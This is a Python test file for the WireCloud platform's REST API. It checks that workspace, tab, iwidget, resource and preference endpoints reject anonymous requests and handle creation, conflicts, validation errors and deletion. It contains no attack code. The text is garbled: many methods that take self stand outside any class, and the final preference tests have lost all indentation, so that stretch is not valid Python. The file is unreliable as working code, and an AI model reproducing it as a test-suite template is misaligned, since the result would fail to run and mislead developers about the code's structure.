    # Check basic response structure
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertTrue('id' in response_data)
    self.assertEqual(response_data['name'], 'test')
    self.assertTrue(isinstance(response_data['wiring'], dict))

    # Workspace should be created (creator=1 is the admin user from the fixtures)
    self.assertTrue(Workspace.objects.filter(creator=1, name='test').exists())
def test_workspace_collection_post_conflict(self):

    """Creating a workspace whose name already exists yields 409 Conflict."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'name': 'ExistingWorkspace',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 409)

def test_workspace_collection_post_creation_from_nonexistent_mashup(self):

    """Creating a workspace from a mashup id that does not exist yields 422."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='normuser', password='admin')

    # Make the request
    data = {
        'mashup': 'Wirecloud/nonexistent-mashup/1.0',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 422)
def test_workspace_collection_post_creation_from_mashup(self):

    """A workspace can be instantiated from an existing mashup resource."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='normuser', password='admin')

    # Make the request
    data = {
        'mashup': 'Wirecloud/test-mashup/1.0',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 201)

    # Check basic response structure
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertTrue('id' in response_data)
    self.assertEqual(response_data['name'], 'Test Mashup')
    self.assertTrue(isinstance(response_data['wiring'], dict))

    # Workspace should be created (creator=2 is normuser in the fixtures)
    self.assertTrue(Workspace.objects.filter(creator=2, name='Test Mashup').exists())

def test_workspace_collection_post_creation_from_mashup_missing_dependencies(self):

    """Instantiating a mashup with unavailable widgets/operators fails with 422
    and reports the missing dependencies; no workspace is created."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='normuser', password='admin')

    # Make the request
    data = {
        'mashup': 'Wirecloud/test-mashup-dependencies/1.0',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 422)

    # Check basic response structure
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertTrue('description' in response_data)
    self.assertTrue('details' in response_data)
    self.assertTrue('missingDependencies' in response_data['details'])
    # Compare as sets: the listing order is not part of the contract
    self.assertEqual(set(response_data['details']['missingDependencies']), set((
        'Wirecloud/nonavailable-operator/1.0',
        'Wirecloud/nonavailable-widget/1.0',
    )))

    # Workspace should not be created
    self.assertFalse(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_collection_post_empty_required_fields(self):

    """An empty creation payload is rejected with 422 and a descriptive error."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='normuser', password='admin')

    # Make the request
    data = {}
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 422)

    # Check basic response structure
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertTrue('description' in response_data)

def test_workspace_collection_post_bad_request_syntax(self):

    """Malformed JSON in the request body is rejected with 400."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='normuser', password='admin')

    # Test bad json syntax
    response = self.client.post(url, 'bad syntax', content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 400)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
def test_workspace_entry_read_requires_authentication(self):

    """Anonymous GET of a workspace entry is rejected with 401; the error
    body honours the Accept header (JSON vs HTML)."""

    url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Check using Accept: text/html
    # FIX: this is a *read* test — the original issued a DELETE here and
    # checked that the workspace was "not deleted", copy-pasted from
    # test_workspace_entry_delete_requires_authentication.
    response = self.client.get(url, HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_read(self):

    """The owner can read a workspace entry; the JSON carries the expected
    structure (id, name, creator, wiring, tabs with preferences/iwidgets)."""

    url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)

    # Response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertTrue('id' in response_data)
    self.assertEqual(response_data['name'], 'ExistingWorkspace')
    self.assertEqual(response_data['creator'], 'user_with_workspaces')
    self.assertTrue('wiring' in response_data)

    # Every workspace has at least one tab; check the first one's shape
    self.assertTrue('tabs' in response_data)
    self.assertTrue(isinstance(response_data['tabs'], list))
    self.assertTrue(len(response_data['tabs']) > 0)
    self.assertTrue(isinstance(response_data['tabs'][0], dict))
    self.assertTrue('id' in response_data['tabs'][0])
    self.assertTrue('name' in response_data['tabs'][0])
    self.assertTrue('preferences' in response_data['tabs'][0])
    self.assertTrue(isinstance(response_data['tabs'][0]['preferences'], dict))
    self.assertTrue('iwidgets' in response_data['tabs'][0])
    self.assertTrue(isinstance(response_data['tabs'][0]['iwidgets'], list))

    self.assertTrue('preferences' in response_data)
    self.assertTrue(isinstance(response_data['preferences'], dict))
def test_workspace_entry_delete_requires_authentication(self):

    """Anonymous DELETE of a workspace is rejected with 401 and the workspace
    survives; the error body honours the Accept header."""

    url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})

    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Workspace should not be deleted
    self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())

    # Check using Accept: text/html
    response = self.client.delete(url, HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')

def test_workspace_entry_delete(self):

    """The owner can delete a workspace; it disappears from the database."""

    url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)

    # Workspace should be removed
    self.assertFalse(Workspace.objects.filter(name='ExistingWorkspace').exists())
def test_workspace_wiring_entry_put_requires_authentication(self):

    """Anonymous PUT of the wiring status is rejected with 401 and the stored
    wiring is left untouched; the error body honours the Accept header."""

    url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})

    # Snapshot the current wiring so we can verify it is unchanged afterwards
    workspace = Workspace.objects.get(id=1)
    old_wiring_status = simplejson.loads(workspace.wiringStatus)

    data = simplejson.dumps({
        'operators': [{'name': 'Operator1'}],
        'connections': [],
    })
    response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Workspace wiring status should not have changed
    workspace = Workspace.objects.get(id=1)
    wiring_status = simplejson.loads(workspace.wiringStatus)
    self.assertEqual(wiring_status, old_wiring_status)

    # Check using Accept: text/html
    response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')

def test_workspace_wiring_entry_put(self):

    """The owner can replace the wiring status; the new status is persisted."""

    url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})

    new_wiring_status = {
        'operators': [{'name': 'Operator1'}],
        'connections': [],
    }

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = simplejson.dumps(new_wiring_status)
    response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)

    # Workspace wiring status should have changed
    workspace = Workspace.objects.get(id=1)
    wiring_status = simplejson.loads(workspace.wiringStatus)
    self.assertEqual(wiring_status, new_wiring_status)
def test_tab_collection_post_requires_authentication(self):

    """Anonymous tab creation is rejected with 401 and no tab is created;
    the error body honours the Accept header."""

    url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})

    data = {
        'name': 'rest_api_test',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Tab should not be created
    self.assertFalse(Tab.objects.filter(name='rest_api_test').exists())

    # Check using Accept: text/html
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')

def test_tab_collection_post(self):

    """The workspace owner can create a tab; it is persisted and echoed back."""

    url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'name': 'rest_api_test',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 201)

    # Check basic response structure
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertEqual(response_data['name'], 'rest_api_test')

    # Tab should be created
    self.assertTrue(Tab.objects.filter(name='rest_api_test').exists())

def test_tab_collection_post_conflict(self):

    """Creating a tab whose name already exists yields 409 Conflict."""

    url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'name': 'ExistingTab',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 409)
def test_tab_entry_delete_requires_authentication(self):

    """Anonymous DELETE of a tab is rejected with 401 and the tab survives;
    the error body honours the Accept header."""

    url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})

    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Tab should not be deleted
    self.assertTrue(Tab.objects.filter(name='ExistingTab').exists())

    # Check using Accept: text/html
    response = self.client.delete(url, HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')

def test_tab_entry_delete(self):

    """The owner can delete a tab; it disappears from the database."""

    url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)

    # Tab should be removed
    self.assertFalse(Tab.objects.filter(name='ExistingTab').exists())
def test_iwidget_collection_post_requires_authentication(self):

    """Anonymous iwidget creation is rejected with 401."""

    url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})

    # Make the request
    data = {
        'widget': 'Wirecloud/Test/1.0',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # IWidget should not be created
    # TODO
def test_iwidget_collection_post(self):

    """The owner can add a widget instance to a tab."""

    url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'widget': 'Wirecloud/Test/1.0',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    # NOTE(review): this endpoint answers 200 where other creations answer
    # 201 — presumably intentional; confirm against the view code.
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

def test_iwidget_entry_post_requires_authentication(self):

    """Anonymous iwidget update is rejected with 401 and the name is unchanged."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Make the request
    data = {
        'name': 'New Name',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # IWidget should not be updated
    iwidget = IWidget.objects.get(pk=2)
    self.assertNotEqual(iwidget.name, 'New Name')

def test_iwidget_entry_post(self):

    """The owner can rename an iwidget; the change is persisted."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'name': 'New Name',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)
    self.assertEqual(response.content, '')

    # Check that the iwidget name has been changed
    iwidget = IWidget.objects.get(pk=2)
    self.assertEqual(iwidget.name, 'New Name')
def test_iwidget_preferences_entry_post_requires_authentication(self):

    """Anonymous update of iwidget preferences is rejected with 401 and the
    stored variable value is unchanged."""

    url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Make the request
    data = {
        'text': 'new value',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # IWidget preferences should not be updated
    variable_value = VariableValue.objects.get(
        user__username='user_with_workspaces',
        variable__vardef__name='text',
        variable__iwidget__id=2
    )
    self.assertNotEqual(variable_value.value, 'new value')

def test_iwidget_preferences_entry_post(self):

    """The owner can update an iwidget preference; the value is persisted."""

    url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    data = {
        'text': 'new value',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)
    self.assertEqual(response.content, '')

    # IWidget preferences should be updated
    variable_value = VariableValue.objects.get(
        user__username='user_with_workspaces',
        variable__vardef__name='text',
        variable__iwidget__id=2
    )
    self.assertEqual(variable_value.value, 'new value')
def test_iwidget_entry_delete_requires_authentication(self):

    """Anonymous DELETE of an iwidget is rejected with 401 and it survives."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Make the request
    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # IWidget should not be deleted (get() raises if it is gone)
    IWidget.objects.get(pk=2)

def test_iwidget_entry_delete(self):

    """The owner can delete an iwidget; it disappears from the database."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Make the request
    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)
    self.assertEqual(response.content, '')

    # IWidget should be deleted
    self.assertRaises(IWidget.DoesNotExist, IWidget.objects.get, pk=2)
class ResourceManagementAPI(WirecloudTestCase):

    """Tests for the showcase resource-management REST API (upload, read, delete)."""

    fixtures = ('selenium_test_data',)
    # FIX: the original ('rest_api') is a plain string, not a tuple — the
    # missing trailing comma makes tag filtering iterate it character by
    # character. ExtraApplicationMashupAPI below writes ('extra_rest_api',).
    tags = ('rest_api',)

    @classmethod
    def setUpClass(cls):

        super(ResourceManagementAPI, cls).setUpClass()

        cls.client = Client()

        # Replace the HTTP download function with a local-filesystem stub so
        # the tests never hit the network; restored in tearDownClass.
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })

        # catalogue deployer: deploy into a throw-away temp dir
        cls.old_catalogue_deployer = catalogue.wgt_deployer
        cls.catalogue_tmp_dir = mkdtemp()
        catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)

        # showcase deployer: same, for the widget showcase
        cls.old_deployer = showcase.wgt_deployer
        cls.showcase_tmp_dir = mkdtemp()
        showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)

    @classmethod
    def tearDownClass(cls):

        downloader.download_http_content = cls._original_download_function

        # deployers: restore the originals and drop the temp dirs
        catalogue.wgt_deployer = cls.old_catalogue_deployer
        shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
        showcase.wgt_deployer = cls.old_deployer
        shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)

        super(ResourceManagementAPI, cls).tearDownClass()
def test_resource_collection_read_requires_authentication(self):

    """Anonymous listing of resources is rejected with 401."""

    url = reverse('wirecloud_showcase.resource_collection')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)

def test_resource_collection_read(self):

    """A logged-in user gets a JSON mapping of resources, each carrying
    type/vendor/name/version metadata."""

    url = reverse('wirecloud_showcase.resource_collection')

    self.client.login(username='admin', password='admin')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    for resource_id in response_data:
        resource = response_data[resource_id]
        self.assertTrue(isinstance(resource, dict))
        self.assertIn('type', resource)
        self.assertIn(resource['type'], CatalogueResource.RESOURCE_TYPES)
        self.assertIn('vendor', resource)
        self.assertIn('name', resource)
        self.assertIn('version', resource)
def test_resource_collection_post_requires_authentication(self):

    """Anonymous resource upload is rejected with 401."""

    url = reverse('wirecloud_showcase.resource_collection')

    response = self.client.post(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)

def test_resource_collection_post(self):

    """A WGT package uploaded as a multipart file is deployed (201) and its
    metadata echoed back."""

    url = reverse('wirecloud_showcase.resource_collection')

    # Authenticate
    self.client.login(username='admin', password='admin')

    # Make the request
    with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
        response = self.client.post(url, data={'file': f}, HTTP_ACCEPT='application/json')

    self.assertEqual(response.status_code, 201)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertIn('type', response_data)
    self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
    self.assertIn('vendor', response_data)
    self.assertIn('name', response_data)
    self.assertIn('version', response_data)

def test_resource_collection_post_using_octet_stream(self):

    """The same WGT can be uploaded as a raw application/octet-stream body."""

    url = reverse('wirecloud_showcase.resource_collection')

    # Authenticate
    self.client.login(username='admin', password='admin')

    # Make the request
    with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
        response = self.client.post(url, f.read(), content_type="application/octet-stream", HTTP_ACCEPT='application/json')

    self.assertEqual(response.status_code, 201)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
    self.assertIn('type', response_data)
    self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
    self.assertIn('vendor', response_data)
    self.assertIn('name', response_data)
    self.assertIn('version', response_data)

def test_resource_collection_post_using_octet_stream_error(self):

    """A body that is not a valid WGT package is rejected with 400."""

    url = reverse('wirecloud_showcase.resource_collection')

    # Authenticate
    self.client.login(username='admin', password='admin')

    # Make the request
    response = self.client.post(url, 'invalid content', content_type="application/octet-stream", HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 400)
def test_resource_entry_read_requires_authentication(self):

    """Anonymous download of a resource entry is rejected with 401."""

    url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)

def test_resource_entry_read(self):

    """A deployed resource's WGT file can be downloaded by a logged-in user."""

    resource_id = [
        'Wirecloud',
        'Test',
        '1.0'
    ]
    url = reverse('wirecloud_showcase.resource_entry', args=resource_id)

    # Stage the packaged WGT file where the deployer expects to find it
    file_name = '_'.join(resource_id) + '.wgt'
    local_dir = catalogue.wgt_deployer.get_base_dir(*resource_id)
    dst_file = os.path.join(local_dir, file_name)

    if not os.path.exists(local_dir):
        os.makedirs(local_dir)
    src_file = os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt')
    shutil.copy(src_file, dst_file)

    # Authenticate
    self.client.login(username='admin', password='admin')

    # Make the request
    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
def test_resource_entry_delete_requires_authentication(self):

    """Anonymous DELETE of a resource entry is rejected with 401."""

    url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)

def test_resource_entry_delete(self):

    """A logged-in admin can delete a resource entry (204 No Content)."""

    url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

    self.client.login(username='admin', password='admin')

    response = self.client.delete(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)
class ExtraApplicationMashupAPI(WirecloudTestCase):

    """Extra (non-core) Application Mashup REST API tests."""

    fixtures = ('initial_data', 'selenium_test_data', 'user_with_workspaces')
    tags = ('extra_rest_api',)

    @classmethod
    def setUpClass(cls):

        # NOTE(review): this fixture setup duplicates
        # ResourceManagementAPI.setUpClass — a shared mixin would remove
        # the duplication.
        super(ExtraApplicationMashupAPI, cls).setUpClass()

        cls.client = Client()

        # Replace the HTTP download function with a local-filesystem stub so
        # the tests never hit the network; restored in tearDownClass.
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })

        # catalogue deployer: deploy into a throw-away temp dir
        cls.old_catalogue_deployer = catalogue.wgt_deployer
        cls.catalogue_tmp_dir = mkdtemp()
        catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)

        # showcase deployer: same, for the widget showcase
        cls.old_deployer = showcase.wgt_deployer
        cls.showcase_tmp_dir = mkdtemp()
        showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)

    @classmethod
    def tearDownClass(cls):

        downloader.download_http_content = cls._original_download_function

        # deployers: restore the originals and drop the temp dirs
        catalogue.wgt_deployer = cls.old_catalogue_deployer
        shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
        showcase.wgt_deployer = cls.old_deployer
        shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)

        super(ExtraApplicationMashupAPI, cls).tearDownClass()
def test_iwidget_collection_read_requires_authentication(self):

    """Anonymous listing of a tab's iwidgets is rejected with 401."""

    url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

def test_iwidget_collection_read(self):

    """The owner gets a JSON list of the tab's iwidgets."""

    url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, list))

def test_iwidget_entry_read_requires_authentication(self):

    """Anonymous read of a single iwidget is rejected with 401."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

def test_iwidget_entry_read(self):

    """The owner can read a single iwidget as a JSON object."""

    url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_read(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_post(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_read(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_post(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_tab_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_read(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
